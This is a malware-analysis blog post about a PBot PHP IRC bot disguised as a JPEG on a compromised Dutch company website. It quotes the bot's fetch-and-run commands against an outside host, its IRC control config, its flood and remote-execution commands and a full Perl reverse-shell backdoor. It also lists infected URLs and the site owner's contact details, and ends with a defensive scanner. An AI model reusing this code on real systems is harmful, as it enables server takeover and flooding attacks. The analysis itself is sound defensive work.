It has been a long time since we last analyzed an active PBot; our previous posts about PBot are here. This new one was spotted by accident during my monitoring this new year. I traced the infection back to before Christmas and noted its activity until yesterday. There is nothing special about this infection except the negligence of the domain owner, whom I informed several times without getting any response or removal action.
This PBot is a plain-text script whose filename is camouflaged with a JPEG extension. It still carries the severe malicious functionality of PBot, which people should know about.
Below is a screenshot of its GUI, if you know how to execute it properly:
Victim: hegeman.com
Infection method probability: credentials (90%), hacked (10%)

Contacts (for alert information):
Registrant: Hegeman Nijverdal BV, Postbus 224, Nijverdal, 7440AE, NL
Administrative Contact: Hoksbergen, B, b.hoksbergen@hegeman.com, Postbus 224, Nijverdal, 7440AE, NL, +31.548611000
Technical Contact: Diensten, Online, kpni@kpn.com, Maanplein 55, Den Haag, 2516CK, NL, +31.8000403

Infected/Injected URLs:
h00p://hegeman.com/configs.jpg
h00p://hegeman.com/images/configs.jpg
h00p://hegeman.com/tmp/configs.jpg?
h00p://www.hegeman.com/configs.jpg
h00p://www.hegeman.com/images/configs.jpg
h00p://www.hegeman.com/tmp/configs.jpg

My log from downloading the above URL to get the sample:

```
Resolving hegeman.com... seconds 0.00, 213.75.22.52
Caching hegeman.com => 213.75.22.52
Connecting to hegeman.com|213.75.22.52|:80... seconds 0.00, connected.
Created socket 1896.
Releasing 0x003d5448 (new refcount 1).
GET /configs.jpg HTTP/1.0
Accept: */*
Host: hegeman.com
Connection: Keep-Alive
HTTP request sent, awaiting response...
HTTP/1.1 200 OK
Date: Fri, 04 Jan 2013 07:34:48 GMT
Server: Apache/2.0.52 (Red Hat) FrontPage/5.0.2.2635
Last-Modified: Thu, 03 Jan 2013 00:44:47 GMT
ETag: "961813c-99e7-ab6eddc0"
Accept-Ranges: bytes
Content-Length: 39399
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: image/jpeg
200 OK
Registered socket 1896 for persistent reuse.
Length: 39,399 (38K) [image/jpeg]
17:39:35 (10.59 KB/s) - `configs.jpg' saved [39399/39399]
```

What looks like a JPEG image (note the Content-Type: image/jpeg above) is actually a PHP script, executed by the infected machine's PHP when it is invoked remotely through the infected URL. Let's look at the significant malicious parts of this script.

The header of this PBot (an ASCII-art banner, then the opening PHP tag):

```php
_/ |_ __ _____ ___ _____| |__ _____ __| _/______ _ __ \ __\ | \ \/ / / ___/ | \\__ \ / __ |/ _ \ \/ \/ / | | | | /> < \___ \| Y \/ __ \_/ /_/ ( <_> ) / |__| |____//__/\_ \_____/____ >___| (____ /\____ |\____/ \/\_/ \/_____/ \/ \/ \/ \/ <br/><?
$dir = @getcwd();
echo "DON TUKULESTO <br>";
$OS = @PHP_OS;
echo "OSTYPE :$OS <br>";
echo "uname -a; $uname <br>";
$free = disk_free_space($dir);
$ob = @ini_get("open_basedir");
$df = @ini_get("disable_functions");
if( ini_get('safe_mode') ) {
    echo "SM: 1 \\ ";
```

It downloads its components from a remote server:

```php
$url="h00p://miri.wap.sh/";
exec('cd /tmp;curl -O '.$url.'mild.txt;perl mild.txt;rm -rf mild.txt*;');
exec('cd /tmp;GET '.$url.'mild.txt > mild.txt;perl mild.txt;rm -rf mild.txt*;');
exec('cd /tmp;wget '.$url.'mild.txt;perl mild.txt;rm -rf mild.txt*;');
exec('cd /tmp;lwp-download '.$url.'mild.txt;perl mild.txt;perl mild.txt;rm -rf mild.txt*;');
exec('cd /tmp;fetch '.$url.'mild.txt >mild.txt;perl mild.txt;rm -rf mild.txt*;');
```

Or it downloads from "other" servers, with varied execution methods such as exec, @popen, shell_exec, system, passthru, etc., i.e.:

```php
@popen('cd /tmp;wget '.$url.'perl.txt;perl perl.txt irc.indoforum.org;rm perl.txt*;/usr/bin/perl perl.txt irc.indoforum.org;rm -rf $HISTFILE', "r");
@popen('cd /tmp;curl -O '.$url.'perl.txt; perl perl.txt irc.indoforum.org;rm perl.txt*;/usr/bin/perl perl.txt irc.indoforum.org;rm -rf $HISTFILE', "r");
@popen('cd /tmp;lwp-download '.$url.'perl.txt;perl perl.txt irc.indoforum.org;/usr/bin/perl perl.txt irc.indoforum.org;rm -rf $HISTFILE', "r");
@popen('cd /tmp;lynx -source '.$url.'perl.txt >perl.txt;perl perl.txt irc.indoforum.org;/usr/bin/perl perl.txt irc.indoforum.org;rm -rf $HISTFILE', "r");
@popen('cd /tmp;fetch '.$url.'perl.txt >perl.txt;perl perl.txt irc.indoforum.org;/usr/bin/perl perl.txt irc.indoforum.org;rm -rf $HISTFILE', "r");
@popen('cd /tmp;GET '.$url.'perl.txt >perl.txt;perl perl.txt irc.indoforum.org;/usr/bin/perl perl.txt irc.indoforum.org;rm -rf $HISTFILE', "r");
```

This PBot's connection config contains the IRC identity of the bad actor behind it (comments translated from Portuguese):

```php
var $config=array(
    "server"=>"irc.javairc.org", // network ip/host
    "port"=>"6667",              // network port
    "pass"=>"",                  // network password
    "prefix"=>"dos",             // bot nick
    "maxrand"=>"4",              // number of digits in the bot nick
    "chan"=>"#seve",             // channel the bots will join
    "chan2"=>"#seve",            // channel where the bots will send the vulns on connect (-n)
    "key"=>"sempakz",            // channel key
    "modes"=>"+p",               // bot modes
    "password"=>"sempakz",       // access password (.user PASSWORD)
    "trigger"=>".",              // command prefix
    "hostauth"=>"@newbie.aja"    // owners' host (* for any hostname)
```

Below are PBot's basic commands; note the remote-execution and TCP/UDP flood commands:

* .user <password> //login to the bot
* .logout //logout of the bot
* .die //kill the bot
* .restart //restart the bot
* .mail <to> <from> <subject> <msg> //send an email
* .dns <IP|HOST> //dns lookup
* .download <URL> <filename> //download a file
* .exec <cmd> // uses exec() //execute a command
* .sexec <cmd> // uses shell_exec() //execute a command
* .cmd <cmd> // uses popen() //execute a command
* .info //get system information
* .php <php code> // uses eval() //execute php code
* .tcpflood <target> <packets> <packetsize> <port> <delay> //tcpflood attack
* .udpflood <target> <packets> <packetsize> <delay> [port] //udpflood attack
* .raw <cmd> //raw IRC command
* .rndnick //change nickname
* .pscan <host> <port> //port scan
* .safe // test safe_mode (dvl)
* .inbox <to> // test inbox (dvl)
* .conback <ip> <port> // conect back (dvl)
* .uname // return shell's uname using a php function (dvl)

The connect-back is handled by the function below: the embedded payload is saved to /tmp/dc.pl and executed locally with perl:

```php
function conback($ip,$port) {
    $this->privmsg($this->config['chan'],"[\2conback\2]: tentando conectando a $ip:$port");
    $dc_source = "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";
    if (is_writable("/tmp")) {
        if (file_exists("/tmp/dc.pl")) {
            unlink("/tmp/dc.pl");
        }
        $fp=fopen("/tmp/dc.pl","w");
        fwrite($fp,base64_decode($dc_source));
        passthru("perl /tmp/dc.pl $ip $port &");
        unlink("/tmp/dc.pl");
```

Whatever that base64-encoded blob is, it is never good. Let's decode it to find out what it is; we end up with the backdoor logic:

```perl
#!/usr/bin/perl
use Socket;
print "Data Cha0s Connect Back Backdoor\n\n";
if (!$ARGV[0]) {
    printf "Usage: $0 [Host] <Port>\n";
    exit(1);
}
print "[*] Dumping Arguments\n";
$host = $ARGV[0];
$port = 80;
if ($ARGV[1]) {
    $port = $ARGV[1];
}
print "[*] Connecting...\n";
$proto = getprotobyname('tcp') || die("Unknown Protocol\n");
socket(SERVER, PF_INET, SOCK_STREAM, $proto) || die ("Socket Error\n");
my $target = inet_aton($host);
if (!connect(SERVER, pack "SnA4x8", 2, $port, $target)) {
    die("Unable to Connect\n");
}
print "[*] Spawning Shell\n";
if (!fork( )) {
    open(STDIN,">&SERVER");
    open(STDOUT,">&SERVER");
    open(STDERR,">&SERVER");
    exec {'/bin/sh'} '-bash' . "\0" x 4;
    exit(0);
}
print "[*] Datached\n\n";
```

Now we know how this bot connects back to its mothership: the script opens a TCP connection to the given host and port, attaches stdin/stdout/stderr to the socket and execs /bin/sh, so the channel can be used to send and receive data as an interactive shell.

The VirusTotal detection ratio is not bad at all:

MD5: 06a940dd7824d6a3a6d5b484bb7ef9d5
File size: 38.5 KB (39399 bytes)
File name: configs.jpg
File type: PHP
Detection ratio: 29 / 46

I wonder why the owner won't delete this script from the server.

For further research on recent PBot infections, below are the infected URLs:
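The disguise used in this case (a PHP script served as configs.jpg with Content-Type image/jpeg) is easy to check for on a web root. The Python scanner below is an added example, not code from this post or from the PBot sample: it flags image-named files that lack real image magic bytes and contain PHP tags or strings specific to the PBot sample above. The directory layout, the sample file contents and the irc.example.invalid host are constructed for the demo.

```python
import re
import tempfile
from pathlib import Path

# Magic bytes of genuine image formats; a disguised script does not start with these.
IMAGE_MAGIC = (b"\xff\xd8\xff", b"\x89PNG\r\n\x1a\n", b"GIF87a", b"GIF89a")
IMAGE_EXTS = {".jpg", ".jpeg", ".png", ".gif"}
PHP_TAG = re.compile(rb"<\?(?:php\b|=|\s)", re.I)
# Markers from the configs.jpg sample above: IRC config, flood handlers, conback, /tmp downloader chains.
PBOT_MARKERS = {
    "irc-config": re.compile(rb'"server"\s*=>\s*"irc\.'),
    "flood-cmds": re.compile(rb"tcpflood|udpflood"),
    "conback": re.compile(rb"function\s+conback\s*\(|/tmp/dc\.pl"),
    "tmp-downloader": re.compile(rb"cd /tmp;\s*(?:curl|wget|fetch|lwp-download|GET|lynx)\b"),
}

def classify(data: bytes, filename: str):
    """Return (verdict, markers); verdict is 'image', 'pbot', 'php-masquerade' or 'other'."""
    if data.startswith(IMAGE_MAGIC):
        return "image", []           # real image header: not the disguise seen in this case
    hits = [name for name, rx in PBOT_MARKERS.items() if rx.search(data)]
    if hits:
        return "pbot", hits
    if Path(filename).suffix.lower() in IMAGE_EXTS and PHP_TAG.search(data):
        return "php-masquerade", []  # PHP tags in an "image", but not PBot's strings
    return "other", []

def scan_tree(root: str):
    """Walk a web root and report every image-named file whose bytes are not an image."""
    findings = {}
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix.lower() in IMAGE_EXTS:
            verdict, hits = classify(path.read_bytes(), path.name)
            if verdict != "image":
                findings[path.relative_to(root).as_posix()] = (verdict, hits)
    return findings

# Constructed samples shaped like the case above (hypothetical host, not the real file's bytes).
FAKE_PBOT = (b"_/ |_ __ ascii banner <br/><? \n$dir = @getcwd();\n"
             b"exec('cd /tmp;wget '.$url.'mild.txt;perl mild.txt;rm -rf mild.txt*;');\n"
             b'var $config=array("server"=>"irc.example.invalid", "chan"=>"#x");\n')
REAL_JPEG = b"\xff\xd8\xff\xe0\x00\x10JFIF\x00" + b"\x00" * 32

def demo():
    """Build a throwaway web root holding both files and return the scan findings."""
    with tempfile.TemporaryDirectory() as root:
        Path(root, "images").mkdir()
        Path(root, "images", "configs.jpg").write_bytes(FAKE_PBOT)
        Path(root, "images", "logo.jpg").write_bytes(REAL_JPEG)
        return scan_tree(root)
```

This only catches files that do not begin with a valid image header, as in this case; a polyglot that is a real JPEG with PHP appended passes the magic check and needs a full image parser or a PHP-tag scan of the entire file.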
#MalwareMustDie!